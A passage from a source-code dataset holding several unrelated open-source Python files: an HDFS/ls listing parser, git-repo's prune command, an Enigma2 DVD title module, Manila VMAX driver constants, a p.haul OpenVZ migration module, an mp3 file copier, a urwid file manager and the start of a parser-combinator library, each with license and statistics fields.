nb_files = str(self.nbFiles)
result = "%s %s %s %s %s %s %s" % (self.rights.ljust(rights_width),
nb_files.ljust(nbFiles_width),
self.owner.ljust(owner_width),
self.group.ljust(group_width),
str(self.size).ljust(size_width),
self.date.strftime("%Y-%M-%d %H:%M").ljust(date_width),
self.path.ljust(path_with))
return result.encode("utf-8")
def get_file_statuses_pretty_print(file_statuses):
rights_width = 0
nb_files_width = 0
owner_width = 0
group_width = 0
size_width = 0
date_width = 0
path_width = 0
if len(file_statuses) != 0:
rights_width = max([len(fs.rights) for fs in file_statuses])
nb_files_width = max([len(str(fs.nbFiles)) for fs in file_statuses])
owner_width = max([len(fs.owner) for fs in file_statuses])
group_width = max([len(fs.group) for fs in file_statuses])
size_width = max([len(str(fs.size)) for fs in file_statuses])
        date_width = max([len(fs.date.strftime("%Y-%m-%d %H:%M")) for fs in file_statuses])
path_width = max([len(fs.path) for fs in file_statuses])
result = []
for file_status in file_statuses:
result.append(file_status.to_str(rights_width, nb_files_width, owner_width, group_width, size_width, date_width, path_width))
return "\n".join(result)
class LsParser(object):
def __init__(self):
pass
def parse_line(self, line):
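        # Expected `ls`-style layout (editor's annotation): rights, file
        # count, owner, group, size, day-of-month, month name, time or year,
        # absolute path.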
regex = "^([rwxd@+-]+)\s+(\d+)\s+(\w+)\s+(\w+)\s+(\d+)\s+(\d+)\s+(\w+)\s+([:\d]+)\s+(/.+)$"
m = re.match(regex, line, re.UNICODE)
if m is None:
return None
rights = m.group(1)
nbFiles = int(m.group(2))
owner = m.group(3)
group = m.group(4)
size = int(m.group(5))
day = int(m.group(6))
month = m.group(7)
try:
month = strptime(month, '%b').tm_mon
except:
month = [u"jan", u"fév", u"mar", u"avr", u"mai", u"jui", u"juil", u"aoû", u"sep", u"oct", u"nov", u"déc"].index(month) + 1
try:
year = int(m.group(8))
except:
year = datetime.datetime.now().year
filename = m.group(9)
date = datetime.date(year, month, day)
return FileStatus(filename, rights, nbFiles, owner, group, size, date)
def parse(self, output):
result = [self.parse_line(line) for line in output.split("\n")]
return [p for p in result if p is not None]
class WebHdfsParser(object):
def __init__(self, path):
self.path = path
def permissions_to_unix_name(self, is_dir, rights):
is_dir_prefix = 'd' if is_dir else '-'
sticky = False
if len(rights) == 4 and rights[0] == '1':
sticky = True
rights = rights[1:]
dic = {'7': 'rwx', '6': 'rw-', '5': 'r-x', '4': 'r--', '3': '-wx', '2': '-w-', '1': '--x', '0': '---'}
result = is_dir_prefix + ''.join(dic[x] for x in rights)
if sticky:
result = result[:-1] + "t"
return result
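    # Example (editor's sketch): permissions_to_unix_name(True, "1755")
    # returns "drwxr-xr-t" (the sticky bit replaces the final execute slot).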

    def parse_status(self, status):
        relpath = status["pathSuffix"]
        path = os.path.join(self.path, relpath)
        nbFiles = 0
        size = status["length"]
        owner = status["owner"]
        group = status["group"]
        is_dir = status["type"] == "DIRECTORY"
        right_digits = status["permission"]
        rights = self.permissions_to_unix_name(is_dir, right_digits)
        # modificationTime is in milliseconds since the epoch.
        parsed_date = datetime.datetime.utcfromtimestamp(int(status["modificationTime"]) / 1000)
        date = datetime.datetime(parsed_date.year, parsed_date.month, parsed_date.day, parsed_date.hour, parsed_date.minute)
        return FileStatus(path, rights, nbFiles, owner, group, size, date, relpath)

    def parse(self, output):
        try:
            j = json.loads(output)
        except ValueError:
            print output
            return []
        if "FileStatuses" not in j or "FileStatus" not in j["FileStatuses"]:
            print j
            return []
        statuses = j["FileStatuses"]["FileStatus"]
        result = []
        for status in statuses:
            result.append(self.parse_status(status))
        return result
|
mit
| 8,956,800,245,281,798,000
| 33.821656
| 134
| 0.539601
| false
| 3.488832
| false
| false
| false
|
lipro-yocto/git-repo
|
subcmds/prune.py
|
1
|
1907
|
# Copyright (C) 2008 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function

from color import Coloring
from command import PagedCommand


class Prune(PagedCommand):
    common = True
    helpSummary = "Prune (delete) already merged topics"
    helpUsage = """
%prog [<project>...]
"""

    def Execute(self, opt, args):
        all_branches = []
        for project in self.GetProjects(args):
            all_branches.extend(project.PruneHeads())

        if not all_branches:
            return

        class Report(Coloring):
            def __init__(self, config):
                Coloring.__init__(self, config, 'status')
                self.project = self.printer('header', attr='bold')

        out = Report(all_branches[0].project.config)
        out.project('Pending Branches')
        out.nl()

        project = None

        for branch in all_branches:
            if project != branch.project:
                project = branch.project
                out.nl()
                out.project('project %s/' % project.relpath)
                out.nl()

            print('%s %-33s ' % (
                branch.name == project.CurrentBranch and '*' or ' ',
                branch.name), end='')
            if not branch.base_exists:
                print('(ignoring: tracking branch is gone: %s)' % (branch.base,))
            else:
                commits = branch.commits
                date = branch.date
                print('(%2d commit%s, %s)' % (
                    len(commits),
                    len(commits) != 1 and 's' or ' ',
                    date))
|
apache-2.0
| -1,370,391,103,459,699,500
| 28.796875
| 74
| 0.633456
| false
| 3.940083
| false
| false
| false
|
atvcaptain/enigma2
|
lib/python/Plugins/Extensions/DVDBurn/Title.py
|
1
|
6455
|
from __future__ import absolute_import
from Components.config import ConfigSubsection, ConfigSubList, ConfigInteger, ConfigText, ConfigSelection
from . import TitleCutter
class ConfigFixedText(ConfigText):
    def __init__(self, text, visible_width=60):
        ConfigText.__init__(self, default=text, fixed_size=True, visible_width=visible_width)

    def handleKey(self, key):
        pass


class Title:
    def __init__(self, project):
        self.properties = ConfigSubsection()
        self.properties.menutitle = ConfigText(fixed_size=False, visible_width=80)
        self.properties.menusubtitle = ConfigText(fixed_size=False, visible_width=80)
        self.properties.aspect = ConfigSelection(choices=[("4:3", _("4:3")), ("16:9", _("16:9"))])
        self.properties.widescreen = ConfigSelection(choices=[("nopanscan", "nopanscan"), ("noletterbox", "noletterbox")])
        self.properties.autochapter = ConfigInteger(default=0, limits=(0, 60))
        self.properties.audiotracks = ConfigSubList()
        self.DVBname = _("Title")
        self.DVBdescr = _("Description")
        self.DVBchannel = _("Channel")
        self.cuesheet = []
        self.source = None
        self.filesize = 0
        self.estimatedDiskspace = 0
        self.inputfile = ""
        self.cutlist = []
        self.chaptermarks = []
        self.timeCreate = None
        self.project = project
        self.length = 0
        self.VideoType = -1
        self.VideoPID = -1
        self.framerate = 0
        self.progressive = -1
        self.resolution = (-1, -1)

    def addService(self, service):
        from os import path
        from enigma import eServiceCenter, iServiceInformation
        from ServiceReference import ServiceReference
        from time import localtime, time
        self.source = service
        serviceHandler = eServiceCenter.getInstance()
        info = serviceHandler.info(service)
        sDescr = info and info.getInfoString(service, iServiceInformation.sDescription) or ""
        self.DVBdescr = sDescr
        sTimeCreate = info.getInfo(service, iServiceInformation.sTimeCreate)
        if sTimeCreate > 1:
            self.timeCreate = localtime(sTimeCreate)
        serviceref = ServiceReference(info.getInfoString(service, iServiceInformation.sServiceref))
        name = info and info.getName(service) or "Title" + sDescr
        self.DVBname = name
        self.DVBchannel = serviceref.getServiceName()
        self.inputfile = service.getPath()
        self.filesize = path.getsize(self.inputfile)
        self.estimatedDiskspace = self.filesize
        self.length = info.getLength(service)

    def addFile(self, filename):
        from enigma import eServiceReference
        ref = eServiceReference(1, 0, filename)
        self.addService(ref)
        self.project.session.openWithCallback(self.titleEditDone, TitleCutter.CutlistReader, self)

    def titleEditDone(self, cutlist):
        self.initDVDmenuText(len(self.project.titles))
        self.cuesheet = cutlist
        self.produceFinalCuesheet()

    def initDVDmenuText(self, track):
        s = self.project.menutemplate.settings
        self.properties.menutitle.setValue(self.formatDVDmenuText(s.titleformat.getValue(), track))
        self.properties.menusubtitle.setValue(self.formatDVDmenuText(s.subtitleformat.getValue(), track))

    def formatDVDmenuText(self, template, track):
        template = template.replace("$i", str(track))
        template = template.replace("$t", self.DVBname)
        template = template.replace("$d", self.DVBdescr)
        template = template.replace("$c", str(len(self.chaptermarks) + 1))
        template = template.replace("$f", self.inputfile)
        template = template.replace("$C", self.DVBchannel)

        #if template.find("$A") >= 0:
        audiolist = []
        for audiotrack in self.properties.audiotracks:
            active = audiotrack.active.getValue()
            if active:
                trackstring = audiotrack.format.getValue()
                trackstring += ' (' + audiotrack.language.getValue() + ')'
                audiolist.append(trackstring)
        audiostring = ', '.join(audiolist)
        template = template.replace("$A", audiostring)

        if template.find("$l") >= 0:
            l = self.length
            lengthstring = "%d:%02d:%02d" % (l / 3600, l % 3600 / 60, l % 60)
            template = template.replace("$l", lengthstring)
        if self.timeCreate:
            template = template.replace("$Y", str(self.timeCreate[0]))
            template = template.replace("$M", str(self.timeCreate[1]))
            template = template.replace("$D", str(self.timeCreate[2]))
            timestring = "%d:%02d" % (self.timeCreate[3], self.timeCreate[4])
            template = template.replace("$T", timestring)
        else:
            template = template.replace("$Y", "").replace("$M", "").replace("$D", "").replace("$T", "")
        return template

    def produceFinalCuesheet(self):
        CUT_TYPE_IN = 0
        CUT_TYPE_OUT = 1
        CUT_TYPE_MARK = 2
        CUT_TYPE_LAST = 3

        accumulated_in = 0
        accumulated_at = 0
        last_in = 0

        self.cutlist = []
        self.chaptermarks = []

        # our demuxer expects *strictly* IN,OUT lists.
        currently_in = not any(type == CUT_TYPE_IN for pts, type in self.cuesheet)
        if currently_in:
            self.cutlist.append(0)  # emulate "in" at first

        for (pts, type) in self.cuesheet:
            #print "pts=", pts, "type=", type, "accumulated_in=", accumulated_in, "accumulated_at=", accumulated_at, "last_in=", last_in
            if type == CUT_TYPE_IN and not currently_in:
                self.cutlist.append(pts)
                last_in = pts
                currently_in = True

            if type == CUT_TYPE_OUT and currently_in:
                self.cutlist.append(pts)
                # accumulate the segment
                accumulated_in += pts - last_in
                accumulated_at = pts
                currently_in = False

            if type == CUT_TYPE_MARK and currently_in:
                # relocate chaptermark against "in" time. This is not 100% accurate,
                # as the in/out points are not.
                reloc_pts = pts - last_in + accumulated_in
                self.chaptermarks.append(reloc_pts)

        if len(self.cutlist) > 1:
            part = accumulated_in / (self.length * 90000.0)
            usedsize = int(part * self.filesize)
            self.estimatedDiskspace = usedsize
            self.length = accumulated_in / 90000
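
    # Illustration (not part of the original plugin): a hypothetical cuesheet in
    # 90 kHz PTS units and what produceFinalCuesheet derives from it.
    # With self.cuesheet = [(0, 0), (900000, 2), (1800000, 1)]
    # (IN at 0 s, chapter MARK at 10 s, OUT at 20 s) the method yields
    # cutlist == [0, 1800000] and chaptermarks == [900000].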

    def getChapterMarks(self, template="$h:$m:$s.$t"):
        timestamps = []
        chapters = []
        minutes = self.properties.autochapter.getValue()
        if len(self.chaptermarks) < 1 and minutes > 0:
            chapterpts = 0
            while chapterpts < (self.length - 60 * minutes) * 90000:
                chapterpts += 90000 * 60 * minutes
                chapters.append(chapterpts)
        else:
            chapters = self.chaptermarks
        for p in chapters:
            timestring = template.replace("$h", str(p / (90000 * 3600)))
            timestring = timestring.replace("$m", ("%02d" % (p % (90000 * 3600) / (90000 * 60))))
            timestring = timestring.replace("$s", ("%02d" % (p % (90000 * 60) / 90000)))
            timestring = timestring.replace("$t", ("%03d" % ((p % 90000) / 90)))
            timestamps.append(timestring)
        return timestamps
|
gpl-2.0
| 1,176,808,851,013,645,800
| 36.52907
| 127
| 0.696514
| false
| 3.119865
| true
| false
| false
|
vponomaryov/manila
|
manila/share/drivers/dell_emc/plugins/vmax/constants.py
|
1
|
1753
|
# Copyright (c) 2016 Dell Inc. or its subsidiaries.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
STATUS_OK = 'ok'
STATUS_INFO = 'info'
STATUS_DEBUG = 'debug'
STATUS_WARNING = 'warning'
STATUS_ERROR = 'error'
STATUS_NOT_FOUND = 'not_found'
MSG_GENERAL_ERROR = '13690601492'
MSG_INVALID_VDM_ID = '14227341325'
MSG_INVALID_MOVER_ID = '14227341323'
MSG_FILESYSTEM_NOT_FOUND = "18522112101"
MSG_FILESYSTEM_EXIST = '13691191325'
MSG_VDM_EXIST = '13421840550'
MSG_SNAP_EXIST = '13690535947'
MSG_INTERFACE_NAME_EXIST = '13421840550'
MSG_INTERFACE_EXIST = '13691781136'
MSG_INTERFACE_INVALID_VLAN_ID = '13421850371'
MSG_INTERFACE_NON_EXISTENT = '13691781134'
MSG_JOIN_DOMAIN = '13157007726'
MSG_UNJOIN_DOMAIN = '13157007723'
# Necessary to retry when VMAX database is locked for provisioning operation
MSG_CODE_RETRY = '13421840537'
IP_ALLOCATIONS = 2
CONTENT_TYPE_URLENCODE = {'Content-Type': 'application/x-www-form-urlencoded'}
XML_HEADER = '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
XML_NAMESPACE = 'http://www.emc.com/schemas/celerra/xml_api'
CIFS_ACL_FULLCONTROL = 'fullcontrol'
CIFS_ACL_READ = 'read'
SSH_DEFAULT_RETRY_PATTERN = r'Error 2201:.*: unable to acquire lock\(s\)'
|
apache-2.0
| 1,427,866,968,296,748,000
| 30.872727
| 78
| 0.731888
| false
| 2.976231
| false
| false
| false
|
avagin/p.haul
|
p_haul_ovz.py
|
1
|
4646
|
#
# OpenVZ containers hauler module
#
import os
import shutil
import p_haul_cgroup
import p_haul_netifapi as netif
import p_haul_fsapi as fsapi
import p_haul_netapi as netapi
import fs_haul_shared
import fs_haul_subtree
name = "ovz"
vzpid_dir = "/var/lib/vzctl/vepid/"
vz_dir = "/vz"
vzpriv_dir = "%s/private" % vz_dir
vzroot_dir = "%s/root" % vz_dir
vz_conf_dir = "/etc/vz/conf/"
vz_pidfiles = "/var/lib/vzctl/vepid/"
cg_image_name = "ovzcg.img"
class p_haul_type:
    def __init__(self, id):
        self._ctid = id
        #
        # This list would contain (v_in, v_out, v_br) tuples where
        # v_in is the name of veth device in CT
        # v_out is its peer on the host
        # v_bridge is the bridge to which this veth is attached
        #
        self._veths = []
        self._cfg = []

    def __load_ct_config(self, dir):
        print "Loading config file from %s" % dir
        ifd = open(os.path.join(dir, self.__ct_config()))
        for line in ifd:
            self._cfg.append(line)
            if line.startswith("NETIF="):
                #
                # Parse and keep veth pairs, later we will
                # equip restore request with this data and
                # will use it while (un)locking the network
                #
                v_in = None
                v_out = None
                v_bridge = None
                vs = line.strip().split("=", 1)[1].strip("\"")
                for parm in vs.split(","):
                    pa = parm.split("=")
                    if pa[0] == "ifname":
                        v_in = pa[1]
                    elif pa[0] == "host_ifname":
                        v_out = pa[1]
                    elif pa[0] == "bridge":
                        v_bridge = pa[1]

                if v_in and v_out:
                    print "\tCollect %s -> %s (%s) veth" % (v_in, v_out, v_bridge)
                    veth = netapi.net_dev()
                    veth.name = v_in
                    veth.pair = v_out
                    veth.link = v_bridge
                    self._veths.append(veth)
        ifd.close()
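
    # Illustration (not part of the original module): a typical NETIF= line from
    # an OpenVZ container config, as dissected by __load_ct_config above:
    #   NETIF="ifname=eth0,mac=00:18:51:C9:D9:63,host_ifname=veth101.0,bridge=br0"
    # -> veth.name == "eth0", veth.pair == "veth101.0", veth.link == "br0"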

    def __apply_cg_config(self):
        print "Applying CT configs"
        # FIXME -- implement
        pass

    def id(self):
        return (name, self._ctid)

    def init_src(self):
        self._fs_mounted = True
        self._bridged = True
        self.__load_ct_config(vz_conf_dir)

    def init_dst(self):
        self._fs_mounted = False
        self._bridged = False

    def root_task_pid(self):
        pf = open(os.path.join(vzpid_dir, self._ctid))
        pid = pf.read()
        return int(pid)

    def __ct_priv(self):
        return "%s/%s" % (vzpriv_dir, self._ctid)

    def __ct_root(self):
        return "%s/%s" % (vzroot_dir, self._ctid)

    def __ct_config(self):
        return "%s.conf" % self._ctid

    #
    # Meta-images for OVZ -- container config and info about CGroups
    #
    def get_meta_images(self, dir):
        cg_img = os.path.join(dir, cg_image_name)
        p_haul_cgroup.dump_hier(self.root_task_pid(), cg_img)
        cfg_name = self.__ct_config()
        return [(os.path.join(vz_conf_dir, cfg_name), cfg_name),
                (cg_img, cg_image_name)]

    def put_meta_images(self, dir):
        print "Putting config file into %s" % vz_conf_dir
        self.__load_ct_config(dir)
        ofd = open(os.path.join(vz_conf_dir, self.__ct_config()), "w")
        ofd.writelines(self._cfg)
        ofd.close()
        # Keep this name, we'll need one in prepare_ct()
        self.cg_img = os.path.join(dir, cg_image_name)

    #
    # Create cgroup hierarchy and put root task into it
    # Hierarchy is unlimited, we will apply config limitations
    # in ->restored->__apply_cg_config later
    #
    def prepare_ct(self, pid):
        p_haul_cgroup.restore_hier(pid, self.cg_img)

    def __umount_root(self):
        print "Umounting CT root"
        os.system("umount %s" % self.__ct_root())
        self._fs_mounted = False

    def mount(self):
        nroot = self.__ct_root()
        print "Mounting CT root to %s" % nroot
        if not os.access(nroot, os.F_OK):
            os.makedirs(nroot)
        os.system("mount --bind %s %s" % (self.__ct_priv(), nroot))
        self._fs_mounted = True
        return nroot

    def umount(self):
        if self._fs_mounted:
            self.__umount_root()

    def get_fs(self):
        rootfs = fsapi.path_to_fs(self.__ct_priv())
        if not rootfs:
            print "CT is on unknown FS"
            return None
        print "CT is on %s" % rootfs
        if rootfs == "nfs":
            return fs_haul_shared.p_haul_fs()
        if rootfs == "ext3" or rootfs == "ext4":
            return fs_haul_subtree.p_haul_fs(self.__ct_priv())
        print "Unknown CT FS"
        return None

    def restored(self, pid):
        print "Writing pidfile"
        pidfile = open(os.path.join(vz_pidfiles, self._ctid), 'w')
        pidfile.write("%d" % pid)
        pidfile.close()
        self.__apply_cg_config()

    def net_lock(self):
        # _veths holds netapi.net_dev objects; the host-side peer is .pair
        for veth in self._veths:
            netif.ifdown(veth.pair)

    def net_unlock(self):
        for veth in self._veths:
            netif.ifup(veth.pair)
            if veth.link and not self._bridged:
                netif.bridge_add(veth.pair, veth.link)

    def can_migrate_tcp(self):
        return True

    def veths(self):
        #
        # Caller wants to see the veth devices: the name in CT, the peer
        # name on the host and, possibly, the bridge. Just return the
        # collected net_dev objects.
        #
        return self._veths
|
lgpl-2.1
| 7,124,431,274,139,254,000
| 23.197917
| 67
| 0.63022
| false
| 2.556962
| true
| false
| false
|
jima80525/pyres
|
pyres/filemanager.py
|
1
|
4287
|
"""
manages the files on the mp3 player
"""
import os
import re
import logging
import shutil
import pyres.utils as utils
def _double_digit_name(name):
    """ Makes all numbers two digit numbers by adding a leading 0 where
    necessary. Three digit or longer numbers are unaffected. """
    # do a little clean up to start with
    name = name.rstrip().replace('\\', '/')
    name = name.rstrip('/')  # make sure we don't have trailing / chars

    # now pull off the trailing '3' on .mp3 filenames so we don't convert that
    mp3suffix = ''
    if name.endswith('mp3'):
        name = name[:-1]
        mp3suffix = '3'

    # the regex produces an empty string at the end, skip that or zfill will
    # expand it to 00.  Note we cannot just remove the last element from the
    # split as it does not always produce an empty element.  Joy
    elements = re.split(r'(\d+)', name)
    if elements[-1] == '':
        elements.pop()

    result = ""
    # this next section is a bit goofy.  We need to tell whether a given
    # element is a number (\d+) or not.  Only if it's a number do we want to do
    # the zfill on it.  Else a name like '1b1a1z.1mp3' ends up adding a zero to
    # the b a and z elements as well as the 1s.  (in other words that string
    # ends up with '010b010a010z.01mp3' instead of '01b01a01z.01mp3')
    # It might be possible to be clever about the regex grouping on the split,
    # but that idea is escaping me presently.
    for element in elements:
        try:
            int(element)
        except ValueError:
            result += element
        else:
            result += element.zfill(2)

    result += mp3suffix
    return re.sub(' +', ' ', result)  # remove double spaces
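
# Illustration (not part of the original module): the padding behaviour the
# comments above describe, on hypothetical names.
def _demo_double_digit_name():
    assert _double_digit_name('Chapter 1.mp3') == 'Chapter 01.mp3'
    assert _double_digit_name('1b1a1z.1mp3') == '01b01a01z.01mp3'
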
class FileManager(object):
    """ Class to manage filesystem on mp3 player """
    def __init__(self, base_dir):
        # set default value for mp3 player
        # base_dir = base_dir or "TestFiles"
        base_dir = base_dir or "/media/jima/3C33-7AC4/"
        self.base_dir = base_dir
        utils.mkdir_p(self.base_dir)

    def does_filesystem_exist(self):
        """ Tests for existence - this is unused in real code, but it's handy
        for unit tests.  It was originally added to keep lint happy. """
        return os.path.exists(self.base_dir)

    def copy_audiobook(self, source_dir, dest_dir=None):
        """ Main routine to convert and copy files to mp3 player """
        if not dest_dir:
            dest_dir = source_dir
            print("Copying audiobook from %s" % source_dir)
        else:
            print("Copying audiobook from %s to %s" % (source_dir, dest_dir))
        for root, dirs, files in os.walk(source_dir):
            dirs.sort()
            for dir_name in dirs:
                full_dir = os.path.join(root, _double_digit_name(dir_name))
                utils.mkdir_p(os.path.join(self.base_dir, full_dir))

            for filename in sorted(files):
                file_name = os.path.join(root, filename)
                newfile = _double_digit_name(os.path.join(self.base_dir,
                                                          dest_dir, file_name))
                logging.debug("copying %s to %s", file_name, newfile)
                print("copying to %s" % (newfile))
                shutil.copyfile(file_name, newfile)

    def copy_episodes_to_player(self, episodes):
        """ Copies the episodes to the mp3 player """
        # make sure the podcast directory exists
        podcast_dir = os.path.join(self.base_dir, "podcasts_" +
                                   utils.current_date_time_as_string())
        utils.mkdir_p(podcast_dir)

        total = len(episodes)
        counter = 0
        for episode in sorted(episodes, key=lambda x: x.date):
            episode.file_name = episode.file_name.replace('\\', '/')
            (_, tail) = os.path.split(episode.file_name)
            newfile = os.path.join(podcast_dir, tail)
            logging.debug("copying %s to %s", episode.file_name, newfile)
            shutil.copyfile(episode.file_name, newfile)
            counter += 1
            logging.debug("copied %s to %s", episode.file_name, newfile)
            print("%2d/%d: copied %s to %s" % (counter, total,
                                               episode.file_name, newfile))
|
mit
| -3,073,739,497,052,079,000
| 40.621359
| 79
| 0.586191
| false
| 3.767135
| false
| false
| false
|
bmars/sisko
|
sisko/app.py
|
1
|
4908
|
# Copyright (C) 2014 Brian Marshall
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from operator import attrgetter
from gi.repository import Gio
import urwid
from sisko.widgets import Dialog, OverlayStack, PathBar, FileItem
# Vim-like cursor movement.
urwid.command_map['k'] = 'cursor up'
urwid.command_map['j'] = 'cursor down'
urwid.command_map['h'] = 'cursor left'
urwid.command_map['l'] = 'cursor right'
class Application:
    """
    Main application class.
    """
    _PALETTE = [('dialog', 'black', 'light gray'),
                ('focused', 'white', 'dark blue'),
                ('folder', 'bold', ''),
                ('folder focused', 'white, bold', 'dark blue'),
                ('footer', 'light gray', 'dark gray'),
                ('footer key', 'white, bold', 'black'),
                ('path-bar', 'white', 'black'),
                ('path-bar current', 'white, bold', 'dark gray')]

    _FOOTER = [('footer key', " Alt+H "), " ", _("Hidden Files"), " ",
               ('footer key', " Q "), " ", _("Quit")]

    def __init__(self):
        self._path_bar = PathBar()
        self._files = urwid.SimpleFocusListWalker([])
        self._toplevel = OverlayStack(urwid.Frame(
            urwid.ListBox(self._files),
            header=self._path_bar,
            footer=urwid.AttrMap(urwid.Text(self._FOOTER), 'footer')))
        self._show_hidden = False

    def run(self, folder: Gio.File):
        """
        Run the application, opening the given folder.
        """
        self._open(folder)
        main = urwid.MainLoop(self._toplevel, self._PALETTE,
                              unhandled_input=self._unhandled_input)
        main.screen.set_terminal_properties(bright_is_bold=False)
        main.run()

    def _open(self, folder: Gio.File):
        """
        Open a folder.
        """
        children = folder.enumerate_children(
            ','.join([Gio.FILE_ATTRIBUTE_STANDARD_IS_HIDDEN,
                      Gio.FILE_ATTRIBUTE_STANDARD_IS_BACKUP,
                      Gio.FILE_ATTRIBUTE_STANDARD_NAME,
                      FileItem.FILE_ATTRIBUTES]),
            Gio.FileQueryInfoFlags.NONE, None)
        self._path_bar.location = folder
        del self._files[:]
        for info in children:
            if self._show_hidden or not (info.get_is_hidden() or
                                         info.get_is_backup()):
                self._files.append(FileItem(folder.get_child(info.get_name()),
                                            info))
        list.sort(self._files, key=attrgetter('name_key'))

    def _open_focused(self):
        """
        Open the focused folder.
        """
        focus = self._files.get_focus()[0]
        if (focus is not None and
                focus.info.get_file_type() == Gio.FileType.DIRECTORY):
            self._open(focus.file)

    def _trash_focused(self):
        """
        Move the focused file to the Trash.
        """
        focus = self._files.get_focus()[0]
        if focus is None:
            return
        dialog = Dialog(
            _("Are you sure you want to move \"{}\" to the Trash?").format(
                focus.info.get_display_name()),
            [(_("Cancel"), 'cancel'), (_("Move to Trash"), 'trash')])

        def on_response(response_id):
            if response_id == 'trash':
                focus.file.trash(None)
                del self._files[self._files.index(focus)]

        self._toplevel.show_dialog(dialog, on_response)

    def _unhandled_input(self, key):
        """
        Handle application key commands.
        """
        if urwid.command_map[key] == 'cursor left':
            # Open previous folder in the path.
            if self._path_bar.previous is not None:
                self._open(self._path_bar.previous)
        elif urwid.command_map[key] == 'cursor right':
            # Open next folder in the path.
            if self._path_bar.next is not None:
                self._open(self._path_bar.next)
        elif urwid.command_map[key] == 'activate':
            self._open_focused()
        elif key == 'delete':
            self._trash_focused()
        elif key == 'meta h':
            self._show_hidden = not self._show_hidden
            self._open(self._path_bar.location)
        elif key in ('Q', 'q'):
            raise urwid.ExitMainLoop
|
gpl-3.0
| 5,710,978,842,891,577,000
| 36.753846
| 78
| 0.556031
| false
| 3.987002
| false
| false
| false
|
loehnertj/bsbgateway
|
bsbgateway/util/jos_parser.py
|
1
|
15340
|
##############################################################################
#
# Copyright (C) Johannes Loehnert, 2013-2015
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import re
__all__ = [
    "Token", "AstNode", "ParserContext", "StackTrace",
    "seq", "multiple", "optional", "anyof",
    "generate_lexer", "re", "generate_parser",
]
class Token(object):
    ntype = 0
    content = None
    srcoffset = 0

    def __init__(o, ntype, content=None, srcoffset=0):
        o.ntype = ntype
        o.content = content
        o.srcoffset = srcoffset

    def __unicode__(o):
        if not o.content:
            return o.ntype
        content = o.content
        if not isinstance(content, unicode):
            content = unicode(content)
        if len(content) > 40:
            content = content[:37] + u"..."
        return unicode(o.ntype) + u"<" + content.replace("\n", "\n ") + u">"

    def __str__(o):
        if not o.content:
            return o.ntype
        content = o.content
        if not isinstance(content, str):
            content = str(content)  # may throw encode error!!!
        if len(content) > 40:
            content = content[:37] + "..."
        return o.ntype + "<" + content.replace("\n", "\n ") + ">"

    __repr__ = __str__

    def __call__(o):
        return o.content

class AstNode:
    """represents a node of the abstract syntax tree
    sequence is a list of the children. Its items
    can be Tokens and AstNodes, mixing is allowed.
    Take care: a single Token object is a valid tree!!
    The tree structure will match the given grammar.
    """
    ntype = ""
    _children = None

    def __init__(o, ntype, children):
        o.ntype = ntype
        o._children = children

    def __str__(o):
        s = o.ntype
        for c in o._children:
            s = s + "\n" + str(c).replace("\n", "\n ")
        return s

    def __unicode__(o):
        s = unicode(o.ntype)
        for c in o._children:
            s = s + u"\n" + unicode(c).replace("\n", "\n ")
        return s

    def __getattr__(o, ntype):
        """gets the child node(s) having the given ntype.
        Returns list of children that matches."""
        result = []
        for c in o._children:
            if c.ntype == ntype:
                result.append(c)
        return result

    def __iter__(o):
        """iterates over the children of this node."""
        return o._children.__iter__()

    def __call__(o):
        """return token content of this subtree.
        The subtree must contain 0 or 1 token, multiple tokens cause an Exception.
        Returns token.content (None if no token is there)."""
        result = [c() for c in o._children]
        result = [x for x in result if x is not None]
        if len(result) > 1:
            raise ValueError("More than one token in subtree '%s'" % o.ntype)
        if len(result) == 0:
            return None
        return result[0]

    def __getitem__(o, key):
        if isinstance(key, basestring):
            l = o.__getattr__(key)
            if len(l) > 1:
                raise ValueError("more than one %s child" % key)
            if len(l) == 0:
                return None
            return l[0]
        else:
            return o._children[key]

    content = property(__call__)
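
# Illustration (not part of the original module): building and querying a tiny
# AstNode tree; the rule/token names are made up for the demo.
def _demo_astnode():
    tree = AstNode("sum", [Token("NUM", "1"), Token("PLUS"), Token("NUM", "2")])
    first = tree[0]()               # "1" -- calling a token returns its content
    nums = [t() for t in tree.NUM]  # attribute access filters children by ntype
    return first, nums              # ("1", ["1", "2"])
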
class ParserContext:
    def __init__(o, tokens, ruleset):
        o.tokens = tokens
        o.ruleset = ruleset.copy()
        o.stack_trace = None
        o.stack = []

    def push(o, symbol):
        '''processor should push HIS OWN name before calling subprocessors, and .pop() afterwards.'''
        o.stack.append(symbol)

    def pop(o):
        o.stack.pop()

    def mktrace(o, symbol, errdescription="", reached_position=-1):
        """create a stack trace and remember it if a bigger position was reached."""
        trace = StackTrace(o.stack + [symbol], errdescription, reached_position)
        # remember the trace if there is none remembered, if it reached longer than the last one,
        # or if it extends the last remembered one.
        if o.stack_trace is None \
                or o.stack_trace.reached_position < trace.reached_position:
            o.stack_trace = trace
        return trace


class StackTrace:
    stack = []
    reached_position = -1
